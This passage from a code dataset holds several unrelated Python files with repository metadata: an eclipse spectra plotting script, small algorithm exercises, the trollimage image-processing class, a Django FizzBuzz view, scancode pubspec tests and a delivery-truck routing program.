CCDData.read(os.path.join(green_path,green_nearest_fname),hdu=0,unit=\"adu\")\n green_wavelength = CCDData.read(os.path.join(green_path,green_nearest_fname),hdu=1,unit=\"angstrom\").data\n red_frame = CCDData.read(os.path.join(red_path,red_nearest_fname),hdu=0,unit=\"adu\")\n red_wavelength = CCDData.read(os.path.join(red_path,red_nearest_fname),hdu=1,unit=\"angstrom\").data\n\n green_image = green_frame.data/green_frame.header[\"EXPTIME\"]\n red_image = red_frame.data/red_frame.header[\"EXPTIME\"]\n\n norm_green = ImageNormalize(green_image,stretch=LogStretch())\n norm_red = ImageNormalize(red_image,stretch=LogStretch())\n\n # im_green = 
ax_specg.pcolormesh(np.arange(green_frame.header[\"NAXIS1\"]),np.arange(green_frame.header[\"NAXIS2\"]),\n # green_image,cmap=cmcm.lajolla,norm=norm_green,shading='auto',rasterized=True)\n\n im_green = ax_specg.pcolormesh(green_wavelength/62./10.,np.arange(green_frame.header[\"NAXIS2\"]) + green_frame.header[\"YWS\"],\n green_image,cmap=cmcm.lajolla,norm=norm_green,shading='auto',rasterized=True)\n \n\n # im_red = ax_specr.pcolormesh(np.arange(red_frame.header[\"NAXIS1\"]),np.arange(green_frame.header[\"NAXIS2\"]),\n # red_image,cmap=cmcm.lajolla,norm=norm_red,shading='auto',rasterized=True)\n\n im_red = ax_specr.pcolormesh(red_wavelength/52./10.,np.arange(red_frame.header[\"NAXIS2\"]) + red_frame.header[\"YWS\"],\n red_image,cmap=cmcm.lajolla,norm=norm_red,shading='auto',rasterized=True)\n\n ax_specg.set_title(\"Green Detector {} {}\".format(green_frame.header[\"DATE-OBS\"][-8:],green_nearest_fname),fontsize=14)\n\n ax_specr.set_title(\"Red Detector {} {}\".format(red_frame.header[\"DATE-OBS\"][-8:],red_nearest_fname),fontsize=14)\n \n ax_specg.invert_yaxis()\n ax_specr.invert_yaxis()\n\n ax_specg.set_xlabel(\"62nd order Wavelength [nm]\",fontsize=14)\n ax_specg.set_ylabel(\"CCD-Y [Pixel]\",fontsize=14)\n \n ax_specr.set_xlabel(\"52nd order Wavelength [nm]\",fontsize=14)\n ax_specr.set_ylabel(\"CCD-Y [Pixel]\",fontsize=14)\n\n for ax_ in (axes.flatten()):\n ax_.tick_params(labelsize=12)\n \n ax_specg_2 = ax_specg.twiny()\n ax_specg_2.set_xlim((green_frame.header[\"NAXIS1\"]-0.5,green_frame.header[\"XWS\"]-0.5))\n ax_specr_2 = ax_specr.twiny()\n ax_specr_2.set_xlim((red_frame.header[\"XWS\"]-0.5,red_frame.header[\"NAXIS1\"]-0.5))\n\n for ax_ in (ax_specg_2,ax_specr_2):\n ax_.tick_params(labelsize=12)\n\n FeXIV_tick_locs = 530.286*np.array([63.,62.,61.])/62.\n FeX_tick_locs = 637.451*np.array([51.,52.,53.])/52.\n\n green_limb_locs = np.array([396,625])\n red_limb_locs = np.array([366,592])\n\n # green_limb_locs = np.array([396,625]) + (sun_y_fitpoly(ii) - sun_y_fitpoly(70))/rsun_context_pixel*np.diff(green_limb_locs)\n # red_limb_locs = np.array([366,592]) + (sun_y_fitpoly(ii) - sun_y_fitpoly(70))/rsun_context_pixel*np.diff(red_limb_locs)\n\n ax_specg_xlim = ax_specg.get_xlim()\n ax_specg_ylim = ax_specg.get_ylim()\n ax_specr_xlim = ax_specr.get_xlim()\n ax_specr_ylim = ax_specr.get_ylim()\n\n ax_specg.set_xticks(list(ax_specg.get_xticks()) + FeXIV_tick_locs.tolist())\n ax_specr.set_xticks(list(ax_specr.get_xticks()) + FeX_tick_locs.tolist())\n\n ax_specg.xaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))\n ax_specr.xaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))\n ax_specg.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))\n ax_specr.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))\n\n #fig.canvas.draw()\n #print(ax_specg.get_xmajorticklabels())\n\n for FeXIV_xtickline, FeXIV_xticklabel, xtick_loc in zip(filter(lambda x: x.get_marker() == 3, ax_specg.get_xticklines()),\n ax_specg.get_xticklabels(),ax_specg.xaxis.get_ticklocs()):\n if xtick_loc in FeXIV_tick_locs:\n FeXIV_xticklabel.set_visible(False)\n FeXIV_xtickline.set_markeredgecolor(\"red\")\n FeXIV_xtickline.set_markeredgewidth(3)\n\n for FeX_xtickline, FeX_xticklabel, xtick_loc in zip(filter(lambda x: x.get_marker() == 3, ax_specr.get_xticklines()),\n ax_specr.get_xticklabels(),ax_specr.xaxis.get_ticklocs()):\n if xtick_loc in FeX_tick_locs:\n FeX_xticklabel.set_visible(False)\n FeX_xtickline.set_markeredgecolor(\"red\")\n FeX_xtickline.set_markeredgewidth(3)\n \n # print([x_.get_marker() for x_ in 
ax_specg.get_yticklines()])\n\n #after the slit is pointed to off-limbs\n if ii >= 66:\n ax_specg.set_yticks(list(ax_specg.get_yticks()) + green_limb_locs.tolist())\n ax_specr.set_yticks(list(ax_specr.get_yticks()) + red_limb_locs.tolist())\n\n for green_limb_ytickline, green_limb_yticklabel, ytick_loc in zip(filter(lambda x: x.get_marker() == 0, ax_specg.get_yticklines()),\n ax_specg.get_yticklabels(),ax_specg.yaxis.get_ticklocs()):\n\n if ytick_loc in green_limb_locs:\n green_limb_yticklabel.set_visible(False)\n green_limb_ytickline.set_markeredgecolor(\"red\")\n green_limb_ytickline.set_markeredgewidth(3)\n\n for red_limb_ytickline, red_limb_yticklabel, ytick_loc in zip(filter(lambda x: x.get_marker() == 0, ax_specr.get_yticklines()),\n ax_specr.get_yticklabels(),ax_specr.yaxis.get_ticklocs()):\n if ytick_loc in red_limb_locs:\n red_limb_yticklabel.set_visible(False)\n red_limb_ytickline.set_markeredgecolor(\"red\")\n red_limb_ytickline.set_markeredgewidth(3)\n\n ax_specg.set_xlim(ax_specg_xlim)\n ax_specr.set_xlim(ax_specr_xlim)\n ax_specg.set_ylim(ax_specg_ylim)\n ax_specr.set_ylim(ax_specr_ylim)\n\n ax_specg_right = ax_specg.secondary_yaxis(\"right\",functions=(func_one_to_one, func_one_to_one))\n ax_specg_right.tick_params(labelright=False)\n ax_specr_right = ax_specr.secondary_yaxis(\"right\",functions=(func_one_to_one, func_one_to_one))\n ax_specr_right.tick_params(labelright=False)\n\n for ax_ in (ax_img, ax_imr):\n ax_.set_aspect(1)\n\n \n # plt.show()\n plt.savefig(fname=os.path.join(\"../../sav/Eclipse/Video_RotSlit_SpecCorr/\",\"Video_RotSlit_SpecCorr_{:03d}.png\".format(ii)),format=\"png\",\n dpi=144,bbox_inches=\"tight\")\n fig.clf()\n for ax_ in axes.flatten():\n ax_.cla()\n plt.close(fig)\n","repo_name":"yjzhu-solar/Eclipse2017","sub_path":"ipynb/eclipse_data/create_eclipse_video_slit_correct_spectra.py","file_name":"create_eclipse_video_slit_correct_spectra.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73982058540","text":"# Approach 1- Greedy\ndef findMinArrowShots(points): # TC O(n log n) // SC O(n) --> timsort algo\n\tif not points: return 0\n\tpoints.sort(key= lambda x:x[1])\n\tfirstEnd=points[0][1]\n\tarrows=1\n\tfor start,end in points:\n\t\t# if the current balloon starts after the end of another one,\n # one needs one more arrow\n\t\tif firstEnd= self.height\n zoom[1] = shape[1] >= self.width\n\n if zoom[0]:\n factor[0] = shape[0] * 1.0 / self.height\n else:\n factor[0] = self.height * 1.0 / shape[0]\n if zoom[1]:\n factor[1] = shape[1] * 1.0 / self.width\n else:\n factor[1] = self.width * 1.0 / shape[1]\n\n if (int(factor[0]) != factor[0] or int(factor[1]) != factor[1]):\n raise ValueError(\"Resize not of integer factor!\")\n\n factor[0] = int(factor[0])\n factor[1] = int(factor[1])\n\n i = 0\n for chn in self.channels:\n if zoom[0]:\n chn = chn.repeat([factor[0]] * chn.shape[0], axis=0)\n else:\n chn = chn[[idx * factor[0]\n for idx in range(int(self.height / factor[0]))],\n :]\n if zoom[1]:\n self.channels[i] = chn.repeat([factor[1]] * chn.shape[1],\n axis=1)\n else:\n self.channels[i] = chn[:,\n [idx * factor[1]\n for idx in range(int(self.width /\n factor[1]))]]\n\n i = i + 1\n\n self.height = self.channels[0].shape[0]\n self.width = self.channels[0].shape[1]\n self.shape = self.channels[0].shape\n\n def replace_luminance(self, luminance):\n \"\"\"Replace the Y channel of the image by the array *luminance*.\n\n If the image is not in YCbCr mode, it 
is converted automatically to\n and from that mode.\n \"\"\"\n if self.is_empty():\n return\n\n if luminance.shape != self.channels[0].shape:\n if ((luminance.shape[0] * 1.0 / luminance.shape[1]) ==\n (self.channels[0].shape[0] * 1.0 / self.channels[0].shape[1])):\n if luminance.shape[0] > self.channels[0].shape[0]:\n self.resize(luminance.shape)\n else:\n raise NameError(\"Luminance smaller than the image !\")\n else:\n raise NameError(\"Not the good shape !\")\n\n mode = self.mode\n if mode.endswith(\"A\"):\n self.convert(\"YCbCrA\")\n self.channels[0] = luminance\n self.convert(mode)\n else:\n self.convert(\"YCbCr\")\n self.channels[0] = luminance\n self.convert(mode)\n\n def enhance(self, inverse=False, gamma=1.0, stretch=\"no\",\n stretch_parameters=None, **kwargs):\n \"\"\"Image enhancement function.\n\n It applies **in this order** inversion,\n gamma correction, and stretching to the current image, with parameters\n *inverse* (see :meth:`Image.invert`), *gamma* (see\n :meth:`Image.gamma`), and *stretch* (see :meth:`Image.stretch`).\n \"\"\"\n self.invert(inverse)\n if stretch_parameters is None:\n stretch_parameters = {}\n\n stretch_parameters.update(kwargs)\n self.stretch(stretch, **stretch_parameters)\n self.gamma(gamma)\n\n def gamma(self, gamma=1.0):\n \"\"\"Apply gamma correction to the channels of the image.\n\n If *gamma* is a\n tuple, then it should have as many elements as the channels of the\n image, and the gamma correction is applied elementwise. If *gamma* is a\n number, the same gamma correction is applied on every channel, if there\n are several channels in the image. The behaviour of :func:`gamma` is\n undefined outside the normal [0,1] range of the channels.\n \"\"\"\n if (isinstance(gamma, (list, tuple, set)) and len(gamma) != len(self.channels)):\n raise ValueError(\"Number of channels and gamma components differ.\")\n if isinstance(gamma, (tuple, list)):\n gamma_list = list(gamma)\n else:\n gamma_list = [gamma] * len(self.channels)\n for i in range(len(self.channels)):\n gamma = float(gamma_list[i])\n if gamma < 0:\n raise ValueError(\"Gamma correction must be a positive number.\")\n logger.debug(\"Applying gamma %f\", gamma)\n if gamma == 1.0:\n continue\n\n if isinstance(self.channels[i], np.ma.core.MaskedArray):\n if ne:\n self.channels[i] = np.ma.array(\n ne.evaluate(\"data ** (1.0 / gamma)\",\n local_dict={\"data\": self.channels[i].data,\n 'gamma': gamma}),\n mask=self.channels[i].mask,\n copy=False)\n else:\n self.channels[i] = np.ma.array(self.channels[i].data **\n (1.0 / gamma),\n mask=self.channels[i].mask,\n copy=False)\n else:\n self.channels[i] = np.where(self.channels[i] >= 0,\n self.channels[i] **\n (1.0 / gamma),\n self.channels[i])\n\n def stretch(self, stretch=\"crude\", **kwargs):\n \"\"\"Apply stretching to the current image.\n\n The value of *stretch* sets\n the type of stretching applied. The values \"histogram\", \"linear\",\n \"crude\" (or \"crude-stretch\") perform respectively histogram\n equalization, contrast stretching (with 5% cutoff on both sides), and\n contrast stretching without cutoff. The value \"logarithmic\" or \"log\"\n will do a logarithmic enhancement towards white. If a tuple or a list\n of two values is given as input, then a contrast stretching is performed\n with the values as cutoff. 
These values should be normalized in the\n range [0.0,1.0].\n \"\"\"\n logger.debug(\"Applying stretch %s with parameters %s\",\n stretch, str(kwargs))\n\n ch_len = len(self.channels)\n if self.mode.endswith(\"A\"):\n ch_len -= 1\n\n if ((isinstance(stretch, tuple) or isinstance(stretch, list))):\n if len(stretch) == 2:\n for i in range(ch_len):\n self.stretch_linear(i, cutoffs=stretch, **kwargs)\n else:\n raise ValueError(\n \"Stretch tuple must have exactly two elements\")\n elif stretch == \"linear\":\n for i in range(ch_len):\n self.stretch_linear(i, **kwargs)\n elif stretch == \"histogram\":\n for i in range(ch_len):\n self.stretch_hist_equalize(i, **kwargs)\n elif stretch in [\"crude\", \"crude-stretch\"]:\n for i in range(ch_len):\n self.crude_stretch(i, **kwargs)\n elif stretch in [\"log\", \"logarithmic\"]:\n for i in range(ch_len):\n self.stretch_logarithmic(i, **kwargs)\n elif stretch == \"no\":\n return\n elif isinstance(stretch, str):\n raise ValueError(\"Stretching method %s not recognized.\" % stretch)\n else:\n raise TypeError(\"Stretch parameter must be a string or a tuple.\")\n\n def invert(self, invert=True):\n \"\"\"Inverts all the channels of a image according to *invert*.\n\n If invert is a tuple or a list, elementwise invertion is performed,\n otherwise all channels are inverted if *invert* is true (default).\n\n Note: 'Inverting' means that black becomes white, and vice-versa, not that the values are negated!\n \"\"\"\n if (isinstance(invert, (tuple, list)) and len(self.channels) != len(invert)):\n raise ValueError(\n \"Number of channels and invert components differ.\")\n\n logger.debug(\"Applying invert with parameters %s\", str(invert))\n if isinstance(invert, (tuple, list)):\n for i, chn in enumerate(self.channels):\n if invert[i]:\n self.channels[i] = 1 - chn\n elif invert:\n for i, chn in enumerate(self.channels):\n self.channels[i] = 1 - chn\n\n def stretch_hist_equalize(self, ch_nb):\n \"\"\"Stretch the current image's colors by performing histogram equalization on channel *ch_nb*.\"\"\"\n logger.info(\"Perform a histogram equalized contrast stretch.\")\n\n if (self.channels[ch_nb].size == np.ma.count_masked(self.channels[ch_nb])):\n logger.warning(\"Nothing to stretch !\")\n return\n\n arr = self.channels[ch_nb]\n\n nwidth = 2048.0\n\n carr = arr.compressed()\n\n cdf = np.arange(0.0, 1.0, 1 / nwidth)\n logger.debug(\"Make histogram bins having equal amount of data, \" +\n \"using numpy percentile function:\")\n bins = np.percentile(carr, list(cdf * 100))\n\n res = np.ma.empty_like(arr)\n res.mask = np.ma.getmaskarray(arr)\n res[~res.mask] = np.interp(carr, bins, cdf)\n\n self.channels[ch_nb] = res\n\n def stretch_logarithmic(self, ch_nb, factor=100.):\n \"\"\"Move data into range [1:factor] and do a normalized logarithmic enhancement.\"\"\"\n logger.debug(\"Perform a logarithmic contrast stretch.\")\n if ((self.channels[ch_nb].size ==\n np.ma.count_masked(self.channels[ch_nb])) or\n (self.channels[ch_nb].min() == self.channels[ch_nb].max())):\n logger.warning(\"Nothing to stretch !\")\n return\n\n crange = (0., 1.0)\n\n arr = self.channels[ch_nb]\n b__ = float(crange[1] - crange[0]) / np.log(factor)\n c__ = float(crange[0])\n slope = (factor - 1.) / float(arr.max() - arr.min())\n arr = 1. 
+ (arr - arr.min()) * slope\n arr = c__ + b__ * np.log(arr)\n self.channels[ch_nb] = arr\n\n def stretch_linear(self, ch_nb, cutoffs=(0.005, 0.005)):\n \"\"\"Stretch linearly the contrast of the current image for a specific channel.\n\n Channel *ch_nb* is the 0-based index.\n Stretching is based on *cutoffs* fractions for left and right trimming.\n \"\"\"\n logger.debug(\"Perform a linear contrast stretch.\")\n\n if ((self.channels[ch_nb].size == np.ma.count_masked(self.channels[ch_nb])) or\n self.channels[ch_nb].min() == self.channels[ch_nb].max()):\n logger.warning(\"Nothing to stretch !\")\n return\n\n arr = self.channels[ch_nb]\n carr = arr.compressed()\n\n logger.debug(\"Calculate the histogram percentiles: \")\n logger.debug(\"Left and right percentiles: \" +\n str(cutoffs[0] * 100) + \" \" + str(cutoffs[1] * 100))\n\n left, right = np.percentile(\n carr, [cutoffs[0] * 100, 100. - cutoffs[1] * 100])\n\n delta_x = (right - left)\n logger.debug(\"Interval: left=%f, right=%f width=%f\",\n left, right, delta_x)\n\n if delta_x > 0.0:\n self.channels[ch_nb] = np.ma.array((arr - left) / delta_x,\n mask=arr.mask)\n else:\n logger.warning(\"Unable to make a contrast stretch!\")\n\n def crude_stretch(self, ch_nb, min_stretch=None, max_stretch=None):\n \"\"\"Perform simple linear stretching (without any cutoff) for a specific channel.\n\n Channel *ch_nb* is the 0-based index. The image is normalized to the [0,1] range.\n \"\"\"\n if min_stretch is None:\n min_stretch = self.channels[ch_nb].min()\n if max_stretch is None:\n max_stretch = self.channels[ch_nb].max()\n\n if isinstance(min_stretch, (list, tuple)):\n min_stretch = min_stretch[ch_nb]\n if isinstance(max_stretch, (list, tuple)):\n max_stretch = max_stretch[ch_nb]\n\n if ((not self.channels[ch_nb].mask.all()) and abs(max_stretch - min_stretch) > 0):\n stretched = self.channels[ch_nb].data.astype(float)\n stretched -= min_stretch\n stretched /= max_stretch - min_stretch\n self.channels[ch_nb] = np.ma.array(stretched,\n mask=self.channels[ch_nb].mask,\n copy=False)\n else:\n logger.warning(\"Nothing to stretch !\")\n\n def merge(self, img):\n \"\"\"Use provided image as a background where the current image has missing data.\"\"\"\n if self.is_empty():\n raise ValueError(\"Cannot merge an empty image.\")\n\n if self.mode != img.mode:\n raise ValueError(\"Cannot merge image of different modes.\")\n\n selfmask = self.channels[0].mask\n for chn in self.channels[1:]:\n selfmask = np.ma.mask_or(selfmask, chn.mask)\n\n for i in range(len(self.channels)):\n self.channels[i] = np.ma.where(selfmask,\n img.channels[i],\n self.channels[i])\n self.channels[i].mask = np.logical_and(selfmask,\n img.channels[i].mask)\n\n def colorize(self, colormap):\n \"\"\"Colorize the current image using *colormap*.\n\n Works only on\"L\" or \"LA\" images.\n \"\"\"\n if self.mode not in (\"L\", \"LA\"):\n raise ValueError(\"Image should be grayscale to colorize\")\n if self.mode == \"LA\":\n alpha = self.channels[1]\n else:\n alpha = None\n self.channels = list(colormap.colorize(self.channels[0]))\n if alpha is not None:\n self.channels.append(alpha)\n self.mode = \"RGBA\"\n else:\n self.mode = \"RGB\"\n\n def palettize(self, colormap):\n \"\"\"Palettize the current image using *colormap*.\n\n Works only on\"L\" or \"LA\" images.\n \"\"\"\n if self.mode not in (\"L\", \"LA\"):\n raise ValueError(\"Image should be grayscale to colorize\")\n self.channels[0], self.palette = colormap.palettize(self.channels[0])\n if self.mode == \"L\":\n self.mode = \"P\"\n else:\n 
self.mode = \"PA\"\n\n def blend(self, other):\n \"\"\"Alpha blend *other* on top of the current image.\"\"\"\n if self.mode != \"RGBA\" or other.mode != \"RGBA\":\n raise ValueError(\"Images must be in RGBA\")\n src = other\n dst = self\n outa = src.channels[3] + dst.channels[3] * (1 - src.channels[3])\n for i in range(3):\n dst.channels[i] = (src.channels[i] * src.channels[3] +\n dst.channels[i] * dst.channels[3] *\n (1 - src.channels[3])) / outa\n dst.channels[i][outa == 0] = 0\n dst.channels[3] = outa\n\n def _repr_png_(self):\n import io\n b = io.BytesIO()\n self.save(b, fformat=\"png\")\n return b.getvalue()\n\n\ndef _areinstances(the_list, types):\n \"\"\"Check if all the elements of the list are of given type.\"\"\"\n return all([isinstance(item, types) for item in the_list])\n\n\ndef _is_pair(item):\n \"\"\"Check if an item is a pair (tuple of size 2).\"\"\"\n return (isinstance(item, (list, tuple, set)) and\n len(item) == 2 and\n not isinstance(item[0], (list, tuple, set)) and\n not isinstance(item[1], (list, tuple, set)))\n\n\ndef _is_list_of_pairs(the_list):\n \"\"\"Check if a list contains only pairs.\"\"\"\n return all([_is_pair(item) for item in the_list])\n\n\ndef ycbcr2rgb(y__, cb_, cr_):\n \"\"\"Convert the three YCbCr channels to RGB channels.\"\"\"\n kb_ = 0.114\n kr_ = 0.299\n\n r__ = 2 * cr_ / (1 - kr_) + y__\n b__ = 2 * cb_ / (1 - kb_) + y__\n g__ = (y__ - kr_ * r__ - kb_ * b__) / (1 - kr_ - kb_)\n\n return r__, g__, b__\n\n\ndef rgb2ycbcr(r__, g__, b__):\n \"\"\"Convert the three RGB channels to YCbCr.\"\"\"\n kb_ = 0.114\n kr_ = 0.299\n\n y__ = kr_ * r__ + (1 - kr_ - kb_) * g__ + kb_ * b__\n cb_ = 1. / (2 * (1 - kb_)) * (b__ - y__)\n cr_ = 1. / (2 * (1 - kr_)) * (r__ - y__)\n\n return y__, cb_, cr_\n","repo_name":"pytroll/trollimage","sub_path":"trollimage/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":41810,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"12069663915","text":"a = int(input())\n\nwhile a!=0:\n check = 0\n arr = [True] * (2*a+1)\n for i in range(2,2*a+1):\n if arr[i]:\n if i > a: check += 1\n for j in range(2*i,2*a+1,i):\n arr[j] = False\n\n print(check)\n a = int(input())","repo_name":"KimSeungHyun1217/Algorithm","sub_path":"baekjoon/4948/베르트랑 공준.py","file_name":"베르트랑 공준.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18113125521","text":"from django.shortcuts import render\n\n# Create your views here.\ndef main(request):\n output = {}\n if request.method == \"POST\":\n try:\n num = int(request.POST['num'])\n if num % 5 == 0 and num % 3 == 0:\n answer = \"FizzBuzz\"\n elif num % 5 == 0:\n answer = \"Buzz\"\n elif num % 3 == 0:\n answer = \"Fizz\"\n else:\n answer = num\n except:\n answer = \"not a valid input\"\n output['answer'] = answer\n return render(request, 'fizzbuzz/prompt.html', output)\n","repo_name":"reddress/heitorpyany","sub_path":"fizzbuzz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7335906828","text":"import os.path\n\nfrom packagedcode import pubspec\n\nfrom packages_test_utils import check_result_equals_expected_json\nfrom packages_test_utils import build_tests\nfrom packages_test_utils import PackageTester\n\ntest_data_dir = os.path.join(os.path.dirname(__file__), 'data')\n\n\nclass 
TestPubspecDatadriven(PackageTester):\n test_data_dir = test_data_dir\n\n def test_pubspec_lock_is_manifest(self):\n test_file = self.get_test_loc('pubspec/locks/dart-pubspec.lock')\n assert pubspec.PubspecLock.is_manifest(test_file)\n\n def test_pubspec_yaml_is_manifest(self):\n test_file = self.get_test_loc('pubspec/specs/authors-pubspec.yaml')\n assert pubspec.PubspecYaml.is_manifest(test_file)\n\n def test_parse_lock(self):\n test_loc = self.get_test_loc('pubspec/mini-pubspec.lock')\n expected_loc = self.get_test_loc('pubspec/mini-pubspec.lock-expected.json', must_exist=False)\n package_manifests = pubspec.PubspecLock.recognize(test_loc)\n self.check_packages(package_manifests, expected_loc, regen=False)\n\n\ndef pub_tester(location,):\n manifests = []\n for package_manifest in pubspec.PubspecYaml.recognize(location):\n manifests.append(package_manifest.to_dict())\n return manifests\n\n\ndef lock_tester(location,):\n manifests = []\n for package_manifest in pubspec.PubspecLock.recognize(location):\n manifests.append(package_manifest.to_dict())\n return manifests\n\n\nbuild_tests(\n test_dir=os.path.join(test_data_dir, 'pubspec/specs'),\n clazz=TestPubspecDatadriven,\n test_method_prefix='test_pubspec_yaml',\n tested_function=pub_tester,\n test_file_suffix='pubspec.yaml',\n regen=False,\n)\n\nbuild_tests(\n test_dir=os.path.join(test_data_dir, 'pubspec/locks'),\n clazz=TestPubspecDatadriven,\n test_method_prefix='test_pubspec_lock',\n tested_function=lock_tester,\n test_file_suffix='pubspec.lock',\n regen=False,\n)\n","repo_name":"maynaS/scancode-toolkit","sub_path":"tests/packagedcode/test_pubspec.py","file_name":"test_pubspec.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"36835019927","text":"#James Wingert #001424955\r\nimport csv\r\nimport datetime\r\n\r\n# Read in csv file that is the mapping of distances between locations\r\nwith open('WGUDistance.csv') as csvfile:\r\n readCSV = csv.reader(csvfile, delimiter=',')\r\n readCSV = list(readCSV)\r\n\r\n# Read in csv file that is the names of all possible delivery locations\r\nwith open('WGUDistanceInfo.csv') as csv_name_file:\r\n name_readCSV = csv.reader(csv_name_file, delimiter=',')\r\n name_readCSV = list(name_readCSV)\r\n\r\n # Function finds the distance by comparing row and column at the point in which they meet\r\n # Space-time complexity is O(1)\r\n def check_distance(row_value, column_value, sum_of_distance):\r\n distance = readCSV[row_value][column_value]\r\n if distance == '':\r\n distance = readCSV[column_value][row_value]\r\n\r\n sum_of_distance += float(distance)\r\n return sum_of_distance\r\n\r\n # this function is very similar to the function above but returns a current distance\r\n # Space-time complexity is O(1)\r\n def check_current_distance(row_value, column_value):\r\n distance = readCSV[row_value][column_value]\r\n if distance == '':\r\n distance = readCSV[column_value][row_value]\r\n return float(distance)\r\n # this is the time that the first truck leaves the hub\r\n first_time_list = ['8:00:00']\r\n second_time_list = ['9:10:00']\r\n third_time_list = ['11:00:00']\r\n\r\n # The default MPH is 18. Dividing distance / 18 it creates total time. 
Divmod is common to help create time\r\n # structure, this string is then used with timedelta\r\n #\r\n # that object is then added to sum which represents total distance for a particular truck\r\n # runtime of function is O(N)\r\n def check_time_first_truck(distance):\r\n new_time = distance / 18\r\n distance_in_minutes = '{0:02.0f}:{1:02.0f}'.format(*divmod(new_time * 60, 60))\r\n final_time = distance_in_minutes + ':00'\r\n first_time_list.append(final_time)\r\n sum = datetime.timedelta()\r\n for i in first_time_list:\r\n (h, m, s) = i.split(':')\r\n d = datetime.timedelta(hours=int(h), minutes=int(m), seconds=int(s))\r\n sum += d\r\n return sum\r\n # Repeated function for second truck\r\n def check_time_second_truck(distance):\r\n new_time = distance / 18\r\n distance_in_minutes = '{0:02.0f}:{1:02.0f}'.format(*divmod(new_time * 60, 60))\r\n final_time = distance_in_minutes + ':00'\r\n second_time_list.append(final_time)\r\n sum = datetime.timedelta()\r\n for i in second_time_list:\r\n (h, m, s) = i.split(':')\r\n d = datetime.timedelta(hours=int(h), minutes=int(m), seconds=int(s))\r\n sum += d\r\n return sum\r\n # Repeated function for the third truck\r\n def check_time_third_truck(distance):\r\n new_time = distance / 18\r\n distance_in_minutes = '{0:02.0f}:{1:02.0f}'.format(*divmod(new_time * 60, 60))\r\n final_time = distance_in_minutes + ':00'\r\n third_time_list.append(final_time)\r\n sum = datetime.timedelta()\r\n for i in third_time_list:\r\n (h, m, s) = i.split(':')\r\n d = datetime.timedelta(hours=int(h), minutes=int(m), seconds=int(s))\r\n sum += d\r\n return sum\r\n\r\n # this function returns the time objects to use in the Packages.py file\r\n # Space-time complexity is O(1)\r\n def check_address():\r\n return name_readCSV\r\n\r\n\r\n # The following is my automated optimizing sorting algorithm utilizing a greedy approach. There are 3 parameters:\r\n # 1. List of not-yet-optimized packages on the truck\r\n # 2. Truck number\r\n # 3. Current location which is constantly updated once the truck is moving.\r\n # The first if statement sets the base case to end the recursion if the list = 0\r\n # By starting with the lowest value of 20, it constantly checks the current distance against every other possible\r\n # location. If a lower value is found, it continues to iterate through the list to match that new lowest value. Once\r\n # the list is completely iterated through, it then adds the package object and associated index to the new lists.\r\n # The lowest values are taken out of the default list, truck_distance_list, and added to the respective\r\n # trucks optimization list. 
The function can then be called recursively and update current location.\r\n # The function call will end once the list is empty.\r\n\r\n # The 2 for loops and the constant look up functions cause this to have:\r\n # Space-time complexity of O(N^2).\r\n\r\n # these lists represent the sorted trucks that are put in order of efficiency in the function below\r\n truck_one_optimized = []\r\n truck_one_optimized_index_list = []\r\n truck_two_optimized = []\r\n truck_two_optimized_index_list = []\r\n truck_three_optimized = []\r\n truck_three_optimized_index_list = []\r\n\r\n\r\n def calculate_shortest_distance(truck_distance_list, truck_number, current_location): # section 1\r\n if len(truck_distance_list) == 0: # section 2\r\n return truck_distance_list\r\n else: #\r\n try:\r\n lowest_value = 20.0\r\n new_location = 0\r\n for index in truck_distance_list:\r\n if check_current_distance(current_location, int(index[1])) <= lowest_value:\r\n lowest_value = check_current_distance(current_location, int(index[1])) # section 3\r\n new_location = int(index[1])\r\n for index in truck_distance_list: # section 4\r\n if check_current_distance(current_location, int(index[1])) == lowest_value:\r\n if truck_number == 1:\r\n truck_one_optimized.append(index)\r\n truck_one_optimized_index_list.append(index[1])\r\n pop_value = truck_distance_list.index(index)\r\n truck_distance_list.pop(pop_value)\r\n current_location = new_location\r\n calculate_shortest_distance(truck_distance_list, 1, current_location)\r\n elif truck_number == 2:\r\n truck_two_optimized.append(index)\r\n truck_two_optimized_index_list.append(index[1])\r\n pop_value = truck_distance_list.index(index)\r\n truck_distance_list.pop(pop_value)\r\n current_location = new_location\r\n calculate_shortest_distance(truck_distance_list, 2, current_location)\r\n elif truck_number == 3:\r\n truck_three_optimized.append(index)\r\n truck_three_optimized_index_list.append(index[1])\r\n pop_value = truck_distance_list.index(index)\r\n truck_distance_list.pop(pop_value)\r\n current_location = new_location\r\n calculate_shortest_distance(truck_distance_list, 3, current_location)\r\n except IndexError:\r\n pass\r\n\r\n truck_one_optimized_index_list.insert(0, '0')\r\n\r\n # Space-time complexity is O(1)\r\n def truck_one_optimized_index():\r\n return truck_one_optimized_index_list\r\n\r\n # Space-time complexity is O(1)\r\n def truck_one_optimized_list():\r\n return truck_one_optimized\r\n\r\n truck_two_optimized_index_list.insert(0, '0')\r\n\r\n # Space-time complexity is O(1)\r\n def truck_two_optimized_index():\r\n return truck_two_optimized_index_list\r\n\r\n # Space-time complexity is O(1)\r\n def truck_two_optimized_list():\r\n return truck_two_optimized\r\n\r\n truck_three_optimized_index_list.insert(0, '0')\r\n\r\n # Space-time complexity is O(1)\r\n def truck_three_optimized_index():\r\n return truck_three_optimized_index_list\r\n\r\n # Space-time complexity is O(1)\r\n def truck_three_optimized_list():\r\n return truck_three_optimized\r\n","repo_name":"JamesWingert/Vehicle-Routing-Program","sub_path":"JamesWingertVRP/Distances.py","file_name":"Distances.py","file_ext":"py","file_size_in_byte":8092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5291840469","text":"from transformers import XLNetTokenizer, XLNetForMultipleChoice\nimport torch\n\n\nclass 